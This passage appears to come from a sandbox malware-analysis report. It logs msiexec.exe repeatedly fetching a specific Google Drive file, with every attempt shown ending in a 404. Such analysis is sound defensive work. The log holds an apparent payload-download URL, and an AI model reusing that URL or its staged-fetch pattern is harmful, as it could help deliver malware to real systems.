                                                                                          2025-01-10 14:18:01 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQ2HLa2190ZiZF4HPMOF_phK788LVxKslIJhZJyMBmfF_xzlD5t-5bLrXnnYkHHbx7oarZtZ94
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:01 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-Iw71Zet5zzOQK6DBVd-_sA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 66 6d 73 42 6b 41 42 31 38 44 67 44 4a 68 33 70 55 36 7a 49 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vfmsBkAB18DgDJh3pU6zIQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          54192.168.2.650039142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:02 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:02 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:02 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: script-src 'nonce-56Y6xNoBMuYqQHnt-vea6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          55192.168.2.650040216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:03 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:03 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgSEFUWaPc9uywwePz5zQv6LjAim6hYxryeqx4brrKSOqLKXjxaLerDh18_9TNULyDkk
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:03 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-aYMjxTNIfvEa2DPB02-zDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 41 71 58 6e 42 34 37 4a 37 59 71 65 57 4d 46 75 5a 4f 6b 78 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9AqXnB47J7YqeWMFuZOkxQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          56192.168.2.650041142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:04 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:05 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:05 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-RbjrLgjkMa5ObxlUSkDjpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          57192.168.2.650042216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:05 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:06 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC5FCXI5opmb7vreuxFh5xyKx3lNtjjX_22mBVQgoKyd_jWovCvJkdEXsbGgrv0xKbXTCcpN1cE
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:06 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-i4w3jNhc2k1eIcH4l2hNcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:06 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 32 49 74 61 78 65 5a 41 4c 73 4f 36 66 6a 4a 6e 61 77 53 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="h2ItaxeZALsO6fjJnawSpA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          58192.168.2.650043142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:07 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:07 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:07 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-wYY4cUOzFerBaMEpsVFquw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          59192.168.2.650044216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:08 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:08 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgQZx2ODWmxRhzrJpaQOPTijRxNsYLg7PrOuhxAx--7Ui2W9jwomxTi08ak3wLeqK0lI
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:08 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-_xSDV4TkkXLQrnhnv0Teow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:08 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 61 54 76 73 49 51 6b 57 62 76 38 53 48 5a 75 31 7a 55 4d 42 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zaTvsIQkWbv8SHZu1zUMBg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          60192.168.2.650046142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:09 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:09 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:09 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-TuRjmv5iUKSj5k0EQVGv7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
